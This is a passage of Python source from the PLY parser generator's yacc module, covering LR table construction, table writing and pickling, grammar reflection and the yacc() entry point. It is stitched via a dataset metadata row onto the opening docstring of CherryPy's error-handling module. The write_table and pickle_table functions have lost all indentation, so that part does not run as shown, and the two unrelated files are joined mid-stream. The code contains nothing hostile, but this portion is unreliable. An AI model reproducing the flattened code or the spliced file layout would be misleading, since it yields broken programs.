    follow sets, and finally attaching lookaheads to productions.
    """
    nullable = self.compute_nullable_nonterminals()
    ntrans = self.find_nonterminal_transitions(C)
    readsets = self.compute_read_sets(C, ntrans, nullable)
    lookbacks, includes = self.compute_lookback_includes(C, ntrans, nullable)
    followsets = self.compute_follow_sets(ntrans, readsets, includes)
    self.add_lookaheads(lookbacks, followsets)
# -----------------------------------------------------------------------------
# lr_parse_table()
#
# This function constructs the parse tables for SLR or LALR
# -----------------------------------------------------------------------------
def lr_parse_table(self):
    """Construct the LR parsing tables (action and goto) for the grammar.

    Handles both SLR and LALR generation depending on self.lr_method.
    Fills self.lr_action and self.lr_goto keyed by state number, records
    shift/reduce conflicts in self.sr_conflicts and reduce/reduce
    conflicts in self.rr_conflicts, and logs a readable description of
    every state to self.log.
    """
    Productions = self.grammar.Productions
    Precedence = self.grammar.Precedence
    goto = self.lr_goto # Goto array
    action = self.lr_action # Action array
    log = self.log # Logger for output
    actionp = { } # Action production array (temporary)
    log.info("Parsing method: %s", self.lr_method)
    # Step 1: Construct C = { I0, I1, ... IN}, collection of LR(0) items
    # This determines the number of states
    C = self.lr0_items()
    if self.lr_method == 'LALR':
        self.add_lalr_lookaheads(C)
    # Build the parser table, state by state
    st = 0
    for I in C:
        # Loop over each production in I
        actlist = [ ] # List of actions
        st_action = { }
        st_actionp = { }
        st_goto = { }
        log.info("")
        log.info("state %d", st)
        log.info("")
        for p in I:
            log.info(" (%d) %s", p.number, str(p))
        log.info("")
        for p in I:
            if p.len == p.lr_index + 1:
                if p.name == "S'":
                    # Start symbol. Accept!
                    st_action["$end"] = 0
                    st_actionp["$end"] = p
                else:
                    # We are at the end of a production. Reduce!
                    if self.lr_method == 'LALR':
                        laheads = p.lookaheads[st]
                    else:
                        # SLR falls back to the FOLLOW set of the nonterminal
                        laheads = self.grammar.Follow[p.name]
                    for a in laheads:
                        actlist.append((a,p,"reduce using rule %d (%s)" % (p.number,p)))
                        r = st_action.get(a,None)
                        if r is not None:
                            # Whoa. Have a shift/reduce or reduce/reduce conflict
                            if r > 0:
                                # Need to decide on shift or reduce here
                                # By default we favor shifting. Need to add
                                # some precedence rules here.
                                sprec,slevel = Productions[st_actionp[a].number].prec
                                rprec,rlevel = Precedence.get(a,('right',0))
                                if (slevel < rlevel) or ((slevel == rlevel) and (rprec == 'left')):
                                    # We really need to reduce here.
                                    st_action[a] = -p.number
                                    st_actionp[a] = p
                                    if not slevel and not rlevel:
                                        log.info(" ! shift/reduce conflict for %s resolved as reduce",a)
                                        self.sr_conflicts.append((st,a,'reduce'))
                                    Productions[p.number].reduced += 1
                                elif (slevel == rlevel) and (rprec == 'nonassoc'):
                                    # Nonassociative token at equal precedence: make it an error entry
                                    st_action[a] = None
                                else:
                                    # Hmmm. Guess we'll keep the shift
                                    if not rlevel:
                                        log.info(" ! shift/reduce conflict for %s resolved as shift",a)
                                        self.sr_conflicts.append((st,a,'shift'))
                            elif r < 0:
                                # Reduce/reduce conflict. In this case, we favor the rule
                                # that was defined first in the grammar file
                                oldp = Productions[-r]
                                pp = Productions[p.number]
                                if oldp.line > pp.line:
                                    st_action[a] = -p.number
                                    st_actionp[a] = p
                                    chosenp,rejectp = pp,oldp
                                    Productions[p.number].reduced += 1
                                    Productions[oldp.number].reduced -= 1
                                else:
                                    chosenp,rejectp = oldp,pp
                                self.rr_conflicts.append((st,chosenp,rejectp))
                                log.info(" ! reduce/reduce conflict for %s resolved using rule %d (%s)", a,st_actionp[a].number, st_actionp[a])
                            else:
                                raise LALRError("Unknown conflict in state %d" % st)
                        else:
                            # No conflict: plain reduce entry (negative rule number)
                            st_action[a] = -p.number
                            st_actionp[a] = p
                            Productions[p.number].reduced += 1
            else:
                i = p.lr_index
                a = p.prod[i+1] # Get symbol right after the "."
                if a in self.grammar.Terminals:
                    g = self.lr0_goto(I,a)
                    j = self.lr0_cidhash.get(id(g),-1)
                    if j >= 0:
                        # We are in a shift state
                        actlist.append((a,p,"shift and go to state %d" % j))
                        r = st_action.get(a,None)
                        if r is not None:
                            # Whoa have a shift/reduce or shift/shift conflict
                            if r > 0:
                                if r != j:
                                    raise LALRError("Shift/shift conflict in state %d" % st)
                            elif r < 0:
                                # Do a precedence check.
                                # - if precedence of reduce rule is higher, we reduce.
                                # - if precedence of reduce is same and left assoc, we reduce.
                                # - otherwise we shift
                                rprec,rlevel = Productions[st_actionp[a].number].prec
                                sprec,slevel = Precedence.get(a,('right',0))
                                if (slevel > rlevel) or ((slevel == rlevel) and (rprec == 'right')):
                                    # We decide to shift here... highest precedence to shift
                                    Productions[st_actionp[a].number].reduced -= 1
                                    st_action[a] = j
                                    st_actionp[a] = p
                                    if not rlevel:
                                        log.info(" ! shift/reduce conflict for %s resolved as shift",a)
                                        self.sr_conflicts.append((st,a,'shift'))
                                elif (slevel == rlevel) and (rprec == 'nonassoc'):
                                    # Nonassociative token at equal precedence: make it an error entry
                                    st_action[a] = None
                                else:
                                    # Hmmm. Guess we'll keep the reduce
                                    if not slevel and not rlevel:
                                        log.info(" ! shift/reduce conflict for %s resolved as reduce",a)
                                        self.sr_conflicts.append((st,a,'reduce'))
                            else:
                                raise LALRError("Unknown conflict in state %d" % st)
                        else:
                            # No conflict: plain shift entry (positive state number)
                            st_action[a] = j
                            st_actionp[a] = p
        # Print the actions associated with each terminal
        _actprint = { }
        for a,p,m in actlist:
            if a in st_action:
                if p is st_actionp[a]:
                    log.info(" %-15s %s",a,m)
                    _actprint[(a,m)] = 1
        log.info("")
        # Print the actions that were not used. (debugging)
        not_used = 0
        for a,p,m in actlist:
            if a in st_action:
                if p is not st_actionp[a]:
                    if not (a,m) in _actprint:
                        log.debug(" ! %-15s [ %s ]",a,m)
                        not_used = 1
                        _actprint[(a,m)] = 1
        if not_used:
            log.debug("")
        # Construct the goto table for this state
        nkeys = { }
        for ii in I:
            for s in ii.usyms:
                if s in self.grammar.Nonterminals:
                    nkeys[s] = None
        for n in nkeys:
            g = self.lr0_goto(I,n)
            j = self.lr0_cidhash.get(id(g),-1)
            if j >= 0:
                st_goto[n] = j
                log.info(" %-30s shift and go to state %d",n,j)
        action[st] = st_action
        actionp[st] = st_actionp
        goto[st] = st_goto
        st += 1
# -----------------------------------------------------------------------------
# write()
#
# This function writes the LR parsing tables to a file
# -----------------------------------------------------------------------------
def write_table(self,modulename,outputdir='',signature=""):
basemodulename = modulename.split(".")[-1]
filename = os.path.join(outputdir,basemodulename) + ".py"
try:
f = open(filename,"w")
f.write("""
# %s
# This file is automatically generated. Do not edit.
_tabversion = %r
_lr_method = %r
_lr_signature = %r
""" % (filename, __tabversion__, self.lr_method, signature))
# Change smaller to 0 to go back to original tables
smaller = 1
# Factor out names to try and make smaller
if smaller:
items = { }
for s,nd in self.lr_action.items():
for name,v in nd.items():
i = items.get(name)
if not i:
i = ([],[])
items[name] = i
i[0].append(s)
i[1].append(v)
f.write("\n_lr_action_items = {")
for k,v in items.items():
f.write("%r:([" % k)
for i in v[0]:
f.write("%r," % i)
f.write("],[")
for i in v[1]:
f.write("%r," % i)
f.write("]),")
f.write("}\n")
f.write("""
_lr_action = { }
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = { }
_lr_action[_x][_k] = _y
del _lr_action_items
""")
else:
f.write("\n_lr_action = { ");
for k,v in self.lr_action.items():
f.write("(%r,%r):%r," % (k[0],k[1],v))
f.write("}\n");
if smaller:
# Factor out names to try and make smaller
items = { }
for s,nd in self.lr_goto.items():
for name,v in nd.items():
i = items.get(name)
if not i:
i = ([],[])
items[name] = i
i[0].append(s)
i[1].append(v)
f.write("\n_lr_goto_items = {")
for k,v in items.items():
f.write("%r:([" % k)
for i in v[0]:
f.write("%r," % i)
f.write("],[")
for i in v[1]:
f.write("%r," % i)
f.write("]),")
f.write("}\n")
f.write("""
_lr_goto = { }
for _k, _v in _lr_goto_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_goto: _lr_goto[_x] = { }
_lr_goto[_x][_k] = _y
del _lr_goto_items
""")
else:
f.write("\n_lr_goto = { ");
for k,v in self.lr_goto.items():
f.write("(%r,%r):%r," % (k[0],k[1],v))
f.write("}\n");
# Write production table
f.write("_lr_productions = [\n")
for p in self.lr_productions:
if p.func:
f.write(" (%r,%r,%d,%r,%r,%d),\n" % (p.str,p.name, p.len, p.func,p.file,p.line))
else:
f.write(" (%r,%r,%d,None,None,None),\n" % (str(p),p.name, p.len))
f.write("]\n")
f.close()
except IOError:
e = sys.exc_info()[1]
sys.stderr.write("Unable to create '%s'\n" % filename)
sys.stderr.write(str(e)+"\n")
return
# -----------------------------------------------------------------------------
# pickle_table()
#
# This function pickles the LR parsing tables to a supplied file object
# -----------------------------------------------------------------------------
def pickle_table(self,filename,signature=""):
try:
import cPickle as pickle
except ImportError:
import pickle
outf = open(filename,"wb")
pickle.dump(__tabversion__,outf,pickle_protocol)
pickle.dump(self.lr_method,outf,pickle_protocol)
pickle.dump(signature,outf,pickle_protocol)
pickle.dump(self.lr_action,outf,pickle_protocol)
pickle.dump(self.lr_goto,outf,pickle_protocol)
outp = []
for p in self.lr_productions:
if p.func:
outp.append((p.str,p.name, p.len, p.func,p.file,p.line))
else:
outp.append((str(p),p.name,p.len,None,None,None))
pickle.dump(outp,outf,pickle_protocol)
outf.close()
# -----------------------------------------------------------------------------
# === INTROSPECTION ===
#
# The following functions and classes are used to implement the PLY
# introspection features followed by the yacc() function itself.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# get_caller_module_dict()
#
# This function returns a dictionary containing all of the symbols defined within
# a caller further down the call stack. This is used to get the environment
# associated with the yacc() call if none was provided.
# -----------------------------------------------------------------------------
def get_caller_module_dict(levels):
    """Return the symbol table of a caller *levels* frames up the stack.

    The result is a copy of that frame's module globals overlaid with its
    locals (locals win).  yacc() uses this to discover grammar rules when
    no explicit module is supplied.
    """
    # sys._getframe(levels) is the frame 'levels' calls above this one.
    # This replaces the old raise/except trick (raising RuntimeError just
    # to obtain a traceback frame) with the direct, cheaper equivalent:
    # the raised frame was _getframe(0), walked back 'levels' times.
    f = sys._getframe(levels)
    ldict = f.f_globals.copy()
    if f.f_globals != f.f_locals:
        ldict.update(f.f_locals)
    return ldict
# -----------------------------------------------------------------------------
# parse_grammar()
#
# This takes a raw grammar rule string and parses it into production data
# -----------------------------------------------------------------------------
def parse_grammar(doc, file, line):
    """Parse a rule docstring into a list of production tuples.

    doc  -- docstring text containing one or more grammar rules
    file -- filename used in error messages
    line -- line number at which *doc* begins in *file*

    Returns a list of (file, lineno, prodname, syms) tuples, one per
    rule alternative.  Raises SyntaxError for malformed rules.
    """
    productions = []
    current = None                    # name of the most recent rule, for '|' lines
    for offset, raw in enumerate(doc.splitlines(), 1):
        lineno = line + offset
        parts = raw.split()
        if not parts:
            continue
        try:
            if parts[0] == '|':
                # A '|' line continues the previous rule
                if not current:
                    raise SyntaxError("%s:%d: Misplaced '|'" % (file, lineno))
                name = current
                symbols = parts[1:]
            else:
                name = parts[0]
                current = name
                op = parts[1]
                symbols = parts[2:]
                if op not in (':', '::='):
                    raise SyntaxError("%s:%d: Syntax error. Expected ':'" % (file, lineno))
            productions.append((file, lineno, name, symbols))
        except SyntaxError:
            raise
        except Exception:
            # Anything else (e.g. a one-token line) is a malformed rule
            raise SyntaxError("%s:%d: Syntax error in rule '%s'" % (file, lineno, raw.strip()))
    return productions
# -----------------------------------------------------------------------------
# ParserReflect()
#
# This class represents information extracted for building a parser including
# start symbol, error function, tokens, precedence list, action functions,
# etc.
# -----------------------------------------------------------------------------
class ParserReflect(object):
    """Extracts and validates parser specification data from a module
    dictionary.

    An instance is pointed at the dictionary of a module that defines a
    grammar (see yacc()).  The get_*() methods pull out the start symbol,
    p_error handler, token list, precedence table and p_* rule functions;
    the validate_*() methods sanity-check them.  Problems are reported on
    self.log and flagged by setting self.error.
    """
    def __init__(self,pdict,log=None):
        # pdict is the module dictionary to introspect
        self.pdict = pdict
        self.start = None
        self.error_func = None
        self.tokens = None
        self.files = {}
        self.grammar = []
        self.error = 0
        if log is None:
            self.log = PlyLogger(sys.stderr)
        else:
            self.log = log
    # Get all of the basic information
    def get_all(self):
        """Run every extraction step."""
        self.get_start()
        self.get_error_func()
        self.get_tokens()
        self.get_precedence()
        self.get_pfunctions()
    # Validate all of the information
    def validate_all(self):
        """Run every validation step.  Returns nonzero if errors occurred."""
        self.validate_start()
        self.validate_error_func()
        self.validate_tokens()
        self.validate_precedence()
        self.validate_pfunctions()
        self.validate_files()
        return self.error
    # Compute a signature over the grammar
    def signature(self):
        """Return an MD5 digest summarizing the grammar specification.

        The digest is compared against the one stored in previously
        generated table files to decide whether they can be reused.
        """
        try:
            from hashlib import md5
        except ImportError:
            # Pre-2.5 fallback
            from md5 import md5
        try:
            sig = md5()
            if self.start:
                sig.update(self.start.encode('latin-1'))
            if self.prec:
                sig.update("".join(["".join(p) for p in self.prec]).encode('latin-1'))
            if self.tokens:
                sig.update(" ".join(self.tokens).encode('latin-1'))
            for f in self.pfuncs:
                if f[3]:
                    # f[3] is the rule function's docstring
                    sig.update(f[3].encode('latin-1'))
        except (TypeError,ValueError):
            pass
        return sig.digest()
    # -----------------------------------------------------------------------------
    # validate_file()
    #
    # This method checks to see if there are duplicated p_rulename() functions
    # in the parser module file. Without this function, it is really easy for
    # users to make mistakes by cutting and pasting code fragments (and it's a real
    # bugger to try and figure out why the resulting parser doesn't work). Therefore,
    # we just do a little regular expression pattern matching of def statements
    # to try and detect duplicates.
    # -----------------------------------------------------------------------------
    def validate_files(self):
        """Warn about p_rulename() functions defined more than once per file."""
        # Match def p_funcname(
        fre = re.compile(r'\s*def\s+(p_[a-zA-Z_0-9]*)\(')
        for filename in self.files.keys():
            base,ext = os.path.splitext(filename)
            if ext != '.py': return 1 # No idea. Assume it's okay.
            try:
                f = open(filename)
                lines = f.readlines()
                f.close()
            except IOError:
                # Source not readable; nothing to check for this file
                continue
            counthash = { }
            for linen,l in enumerate(lines):
                linen += 1 # report 1-based line numbers
                m = fre.match(l)
                if m:
                    name = m.group(1)
                    prev = counthash.get(name)
                    if not prev:
                        counthash[name] = linen
                    else:
                        self.log.warning("%s:%d: Function %s redefined. Previously defined on line %d", filename,linen,name,prev)
    # Get the start symbol
    def get_start(self):
        self.start = self.pdict.get('start')
    # Validate the start symbol
    def validate_start(self):
        if self.start is not None:
            if not isinstance(self.start,str):
                self.log.error("'start' must be a string")
    # Look for error handler
    def get_error_func(self):
        self.error_func = self.pdict.get('p_error')
    # Validate the error function
    def validate_error_func(self):
        if self.error_func:
            if isinstance(self.error_func,types.FunctionType):
                ismethod = 0
            elif isinstance(self.error_func, types.MethodType):
                ismethod = 1
            else:
                self.log.error("'p_error' defined, but is not a function or method")
                self.error = 1
                return
            eline = func_code(self.error_func).co_firstlineno
            efile = func_code(self.error_func).co_filename
            self.files[efile] = 1
            # p_error must take exactly one argument (plus self for methods)
            if (func_code(self.error_func).co_argcount != 1+ismethod):
                self.log.error("%s:%d: p_error() requires 1 argument",efile,eline)
                self.error = 1
    # Get the tokens map
    def get_tokens(self):
        tokens = self.pdict.get("tokens",None)
        if not tokens:
            self.log.error("No token list is defined")
            self.error = 1
            return
        if not isinstance(tokens,(list, tuple)):
            self.log.error("tokens must be a list or tuple")
            self.error = 1
            return
        # NOTE(review): this check is unreachable -- an empty sequence was
        # already rejected by the first 'if not tokens' above.
        if not tokens:
            self.log.error("tokens is empty")
            self.error = 1
            return
        self.tokens = tokens
    # Validate the tokens
    def validate_tokens(self):
        # Validate the tokens.
        if 'error' in self.tokens:
            self.log.error("Illegal token name 'error'. Is a reserved word")
            self.error = 1
            return
        terminals = {}
        for n in self.tokens:
            if n in terminals:
                self.log.warning("Token '%s' multiply defined", n)
            terminals[n] = 1
    # Get the precedence map (if any)
    def get_precedence(self):
        self.prec = self.pdict.get("precedence",None)
    # Validate and parse the precedence map
    def validate_precedence(self):
        """Check the user's precedence table and flatten it into
        self.preclist as (term, assoc, level) tuples, levels from 1."""
        preclist = []
        if self.prec:
            if not isinstance(self.prec,(list,tuple)):
                self.log.error("precedence must be a list or tuple")
                self.error = 1
                return
            for level,p in enumerate(self.prec):
                if not isinstance(p,(list,tuple)):
                    self.log.error("Bad precedence table")
                    self.error = 1
                    return
                if len(p) < 2:
                    self.log.error("Malformed precedence entry %s. Must be (assoc, term, ..., term)",p)
                    self.error = 1
                    return
                assoc = p[0]
                if not isinstance(assoc,str):
                    self.log.error("precedence associativity must be a string")
                    self.error = 1
                    return
                for term in p[1:]:
                    if not isinstance(term,str):
                        self.log.error("precedence items must be strings")
                        self.error = 1
                        return
                    # Later entries in the table bind tighter (higher level)
                    preclist.append((term,assoc,level+1))
        self.preclist = preclist
    # Get all p_functions from the grammar
    def get_pfunctions(self):
        p_functions = []
        for name, item in self.pdict.items():
            if name[:2] != 'p_': continue
            if name == 'p_error': continue
            if isinstance(item,(types.FunctionType,types.MethodType)):
                line = func_code(item).co_firstlineno
                file = func_code(item).co_filename
                p_functions.append((line,file,name,item.__doc__))
        # Sort all of the actions by line number
        p_functions.sort()
        self.pfuncs = p_functions
    # Validate all of the p_functions
    def validate_pfunctions(self):
        """Check every p_* rule function and parse its docstring grammar
        into self.grammar as (funcname, rule-tuple) pairs."""
        grammar = []
        # Check for non-empty symbols
        if len(self.pfuncs) == 0:
            self.log.error("no rules of the form p_rulename are defined")
            self.error = 1
            return
        for line, file, name, doc in self.pfuncs:
            func = self.pdict[name]
            # Methods take (self, p); plain functions take (p)
            if isinstance(func, types.MethodType):
                reqargs = 2
            else:
                reqargs = 1
            if func_code(func).co_argcount > reqargs:
                self.log.error("%s:%d: Rule '%s' has too many arguments",file,line,func.__name__)
                self.error = 1
            elif func_code(func).co_argcount < reqargs:
                self.log.error("%s:%d: Rule '%s' requires an argument",file,line,func.__name__)
                self.error = 1
            elif not func.__doc__:
                self.log.warning("%s:%d: No documentation string specified in function '%s' (ignored)",file,line,func.__name__)
            else:
                try:
                    parsed_g = parse_grammar(doc,file,line)
                    for g in parsed_g:
                        grammar.append((name, g))
                except SyntaxError:
                    e = sys.exc_info()[1]
                    self.log.error(str(e))
                    self.error = 1
                # Looks like a valid grammar rule
                # Mark the file in which defined.
                self.files[file] = 1
        # Secondary validation step that looks for p_ definitions that are not functions
        # or functions that look like they might be grammar rules.
        for n,v in self.pdict.items():
            if n[0:2] == 'p_' and isinstance(v, (types.FunctionType, types.MethodType)): continue
            if n[0:2] == 't_': continue
            if n[0:2] == 'p_' and n != 'p_error':
                self.log.warning("'%s' not defined as a function", n)
            if ((isinstance(v,types.FunctionType) and func_code(v).co_argcount == 1) or
                (isinstance(v,types.MethodType) and func_code(v).co_argcount == 2)):
                try:
                    # Heuristic: a docstring like "name : ..." suggests a
                    # grammar rule missing its p_ prefix
                    doc = v.__doc__.split(" ")
                    if doc[1] == ':':
                        self.log.warning("%s:%d: Possible grammar rule '%s' defined without p_ prefix",
                                         func_code(v).co_filename, func_code(v).co_firstlineno,n)
                except Exception:
                    pass
        self.grammar = grammar
# -----------------------------------------------------------------------------
# yacc(module)
#
# Build a parser
# -----------------------------------------------------------------------------
def yacc(method='LALR', debug=yaccdebug, module=None, tabmodule=tab_module, start=None,
         check_recursion=1, optimize=0, write_tables=1, debugfile=debug_file,outputdir='',
         debuglog=None, errorlog = None, picklefile=None):
    """Build an LR parser from grammar rules found in the calling module
    (or in *module* if given).

    method     -- 'LALR' or 'SLR' table construction
    debug      -- write a debugging log of the grammar and tables
    module     -- module (or object) supplying p_* rules; defaults to caller
    tabmodule  -- name of the generated table module
    start      -- override for the grammar start symbol
    check_recursion -- verify reachability and detect infinite recursion
    optimize   -- skip signature checking and reuse tables unconditionally
    write_tables -- write the generated tables to tabmodule
    debugfile  -- file name for the debug log
    outputdir  -- directory for generated files
    debuglog/errorlog -- logger objects for debug/error output
    picklefile -- pickle tables to this file instead of writing a module

    Returns an LRParser instance; also stores its parse method in the
    module-global 'parse'.  Raises YaccError if the grammar is unusable.
    """
    global parse # Reference to the parsing method of the last built parser
    # If pickling is enabled, table files are not created
    if picklefile:
        write_tables = 0
    if errorlog is None:
        errorlog = PlyLogger(sys.stderr)
    # Get the module dictionary used for the parser
    if module:
        _items = [(k,getattr(module,k)) for k in dir(module)]
        pdict = dict(_items)
    else:
        pdict = get_caller_module_dict(2)
    # Collect parser information from the dictionary
    pinfo = ParserReflect(pdict,log=errorlog)
    pinfo.get_all()
    if pinfo.error:
        raise YaccError("Unable to build parser")
    # Check signature against table files (if any)
    signature = pinfo.signature()
    # Read the tables
    try:
        lr = LRTable()
        if picklefile:
            read_signature = lr.read_pickle(picklefile)
        else:
            read_signature = lr.read_table(tabmodule)
        # Reuse cached tables when the grammar is unchanged (or optimize set)
        if optimize or (read_signature == signature):
            try:
                lr.bind_callables(pinfo.pdict)
                parser = LRParser(lr,pinfo.error_func)
                parse = parser.parse
                return parser
            except Exception:
                e = sys.exc_info()[1]
                errorlog.warning("There was a problem loading the table file: %s", repr(e))
    except VersionError:
        e = sys.exc_info()
        errorlog.warning(str(e))
    except Exception:
        # Any failure to load cached tables just means we regenerate them
        pass
    if debuglog is None:
        if debug:
            debuglog = PlyLogger(open(debugfile,"w"))
        else:
            debuglog = NullLogger()
    debuglog.info("Created by PLY version %s (http://www.dabeaz.com/ply)", __version__)
    errors = 0
    # Validate the parser information
    if pinfo.validate_all():
        raise YaccError("Unable to build parser")
    if not pinfo.error_func:
        errorlog.warning("no p_error() function is defined")
    # Create a grammar object
    grammar = Grammar(pinfo.tokens)
    # Set precedence level for terminals
    for term, assoc, level in pinfo.preclist:
        try:
            grammar.set_precedence(term,assoc,level)
        except GrammarError:
            e = sys.exc_info()[1]
            errorlog.warning("%s",str(e))
    # Add productions to the grammar
    for funcname, gram in pinfo.grammar:
        file, line, prodname, syms = gram
        try:
            grammar.add_production(prodname,syms,funcname,file,line)
        except GrammarError:
            e = sys.exc_info()[1]
            errorlog.error("%s",str(e))
            errors = 1
    # Set the grammar start symbols
    try:
        if start is None:
            grammar.set_start(pinfo.start)
        else:
            grammar.set_start(start)
    except GrammarError:
        e = sys.exc_info()[1]
        errorlog.error(str(e))
        errors = 1
    if errors:
        raise YaccError("Unable to build parser")
    # Verify the grammar structure
    undefined_symbols = grammar.undefined_symbols()
    for sym, prod in undefined_symbols:
        errorlog.error("%s:%d: Symbol '%s' used, but not defined as a token or a rule",prod.file,prod.line,sym)
        errors = 1
    unused_terminals = grammar.unused_terminals()
    if unused_terminals:
        debuglog.info("")
        debuglog.info("Unused terminals:")
        debuglog.info("")
        for term in unused_terminals:
            errorlog.warning("Token '%s' defined, but not used", term)
            debuglog.info(" %s", term)
    # Print out all productions to the debug log
    if debug:
        debuglog.info("")
        debuglog.info("Grammar")
        debuglog.info("")
        for n,p in enumerate(grammar.Productions):
            debuglog.info("Rule %-5d %s", n, p)
    # Find unused non-terminals
    unused_rules = grammar.unused_rules()
    for prod in unused_rules:
        errorlog.warning("%s:%d: Rule '%s' defined, but not used", prod.file, prod.line, prod.name)
    if len(unused_terminals) == 1:
        errorlog.warning("There is 1 unused token")
    if len(unused_terminals) > 1:
        errorlog.warning("There are %d unused tokens", len(unused_terminals))
    if len(unused_rules) == 1:
        errorlog.warning("There is 1 unused rule")
    if len(unused_rules) > 1:
        errorlog.warning("There are %d unused rules", len(unused_rules))
    if debug:
        debuglog.info("")
        debuglog.info("Terminals, with rules where they appear")
        debuglog.info("")
        terms = list(grammar.Terminals)
        terms.sort()
        for term in terms:
            debuglog.info("%-20s : %s", term, " ".join([str(s) for s in grammar.Terminals[term]]))
        debuglog.info("")
        debuglog.info("Nonterminals, with rules where they appear")
        debuglog.info("")
        nonterms = list(grammar.Nonterminals)
        nonterms.sort()
        for nonterm in nonterms:
            debuglog.info("%-20s : %s", nonterm, " ".join([str(s) for s in grammar.Nonterminals[nonterm]]))
        debuglog.info("")
    if check_recursion:
        unreachable = grammar.find_unreachable()
        for u in unreachable:
            errorlog.warning("Symbol '%s' is unreachable",u)
        infinite = grammar.infinite_cycles()
        for inf in infinite:
            errorlog.error("Infinite recursion detected for symbol '%s'", inf)
            errors = 1
    unused_prec = grammar.unused_precedence()
    for term, assoc in unused_prec:
        errorlog.error("Precedence rule '%s' defined for unknown symbol '%s'", assoc, term)
        errors = 1
    if errors:
        raise YaccError("Unable to build parser")
    # Run the LRGeneratedTable on the grammar
    if debug:
        errorlog.debug("Generating %s tables", method)
    lr = LRGeneratedTable(grammar,method,debuglog)
    if debug:
        num_sr = len(lr.sr_conflicts)
        # Report shift/reduce and reduce/reduce conflicts
        if num_sr == 1:
            errorlog.warning("1 shift/reduce conflict")
        elif num_sr > 1:
            errorlog.warning("%d shift/reduce conflicts", num_sr)
        num_rr = len(lr.rr_conflicts)
        if num_rr == 1:
            errorlog.warning("1 reduce/reduce conflict")
        elif num_rr > 1:
            errorlog.warning("%d reduce/reduce conflicts", num_rr)
    # Write out conflicts to the output file
    if debug and (lr.sr_conflicts or lr.rr_conflicts):
        debuglog.warning("")
        debuglog.warning("Conflicts:")
        debuglog.warning("")
        for state, tok, resolution in lr.sr_conflicts:
            debuglog.warning("shift/reduce conflict for %s in state %d resolved as %s", tok, state, resolution)
        # Report each distinct reduce/reduce conflict only once
        already_reported = {}
        for state, rule, rejected in lr.rr_conflicts:
            if (state,id(rule),id(rejected)) in already_reported:
                continue
            debuglog.warning("reduce/reduce conflict in state %d resolved using rule (%s)", state, rule)
            debuglog.warning("rejected rule (%s) in state %d", rejected,state)
            errorlog.warning("reduce/reduce conflict in state %d resolved using rule (%s)", state, rule)
            errorlog.warning("rejected rule (%s) in state %d", rejected, state)
            already_reported[state,id(rule),id(rejected)] = 1
        warned_never = []
        for state, rule, rejected in lr.rr_conflicts:
            if not rejected.reduced and (rejected not in warned_never):
                debuglog.warning("Rule (%s) is never reduced", rejected)
                errorlog.warning("Rule (%s) is never reduced", rejected)
                warned_never.append(rejected)
    # Write the table file if requested
    if write_tables:
        lr.write_table(tabmodule,outputdir,signature)
    # Write a pickled version of the tables
    if picklefile:
        lr.pickle_table(picklefile,signature)
    # Build the parser
    lr.bind_callables(pinfo.pdict)
    parser = LRParser(lr,pinfo.error_func)
    parse = parser.parse
    return parser
| mit |
OndinaHQ/Tracker | cherrypy/_cperror.py | 82 | 21755 | """Exception classes for CherryPy.
CherryPy provides (and uses) exceptions for declaring that the HTTP response
should be a status other than the default "200 OK". You can ``raise`` them like
normal Python exceptions. You can also call them and they will raise themselves;
this means you can set an :class:`HTTPError<cherrypy._cperror.HTTPError>`
or :class:`HTTPRedirect<cherrypy._cperror.HTTPRedirect>` as the
:attr:`request.handler<cherrypy._cprequest.Request.handler>`.
.. _redirectingpost:
Redirecting POST
================
When you GET a resource and are redirected by the server to another Location,
there's generally no problem since GET is both a "safe method" (there should
be no side-effects) and an "idempotent method" (multiple calls are no different
than a single call).
POST, however, is neither safe nor idempotent--if you
charge a credit card, you don't want to be charged twice by a redirect!
For this reason, *none* of the 3xx responses permit a user-agent (browser) to
resubmit a POST on redirection without first confirming the action with the user:
===== ================================= ===========
300 Multiple Choices Confirm with the user
301 Moved Permanently Confirm with the user
302 Found (Object moved temporarily) Confirm with the user
303 See Other GET the new URI--no confirmation
304 Not modified (for conditional GET only--POST should not raise this error)
305 Use Proxy Confirm with the user
307 Temporary Redirect Confirm with the user
===== ================================= ===========
However, browsers have historically implemented these restrictions poorly;
in particular, many browsers do not force the user to confirm 301, 302
or 307 when redirecting POST. For this reason, CherryPy defaults to 303,
which most user-agents appear to have implemented correctly. Therefore, if
you raise HTTPRedirect for a POST request, the user-agent will most likely
attempt to GET the new URI (without asking for confirmation from the user).
We realize this is confusing for developers, but it's the safest thing we
could do. You are of course free to raise ``HTTPRedirect(uri, status=302)``
or any other 3xx status if you know what you're doing, but given the
environment, we couldn't let any of those be the default.
Custom Error Handling
=====================
.. image:: /refman/cperrors.gif
Anticipated HTTP responses
--------------------------
The 'error_page' config namespace can be used to provide custom HTML output for
expected responses (like 404 Not Found). Supply a filename from which the output
will be read. The contents will be interpolated with the values %(status)s,
%(message)s, %(traceback)s, and %(version)s using plain old Python
`string formatting <http://www.python.org/doc/2.6.4/library/stdtypes.html#string-formatting-operations>`_.
::
_cp_config = {'error_page.404': os.path.join(localDir, "static/index.html")}
Beginning in version 3.1, you may also provide a function or other callable as
an error_page entry. It will be passed the same status, message, traceback and
version arguments that are interpolated into templates::
def error_page_402(status, message, traceback, version):
return "Error %s - Well, I'm very sorry but you haven't paid!" % status
cherrypy.config.update({'error_page.402': error_page_402})
Also in 3.1, in addition to the numbered error codes, you may also supply
"error_page.default" to handle all codes which do not have their own error_page entry.
Unanticipated errors
--------------------
CherryPy also has a generic error handling mechanism: whenever an unanticipated
error occurs in your code, it will call
:func:`Request.error_response<cherrypy._cprequest.Request.error_response>` to set
the response status, headers, and body. By default, this is the same output as
:class:`HTTPError(500) <cherrypy._cperror.HTTPError>`. If you want to provide
some other behavior, you generally replace "request.error_response".
Here is some sample code that shows how to display a custom error message and
send an e-mail containing the error::
from cherrypy import _cperror
def handle_error():
cherrypy.response.status = 500
cherrypy.response.body = ["<html><body>Sorry, an error occurred</body></html>"]
sendMail('error@domain.com', 'Error in your web app', _cperror.format_exc())
class Root:
_cp_config = {'request.error_response': handle_error}
Note that you have to explicitly set :attr:`response.body <cherrypy._cprequest.Response.body>`
and not simply return an error message as a result.
"""
from cgi import escape as _escape
from sys import exc_info as _exc_info
from traceback import format_exception as _format_exception
from cherrypy._cpcompat import basestring, bytestr, iteritems, ntob, tonative, urljoin as _urljoin
from cherrypy.lib import httputil as _httputil
class CherryPyException(Exception):
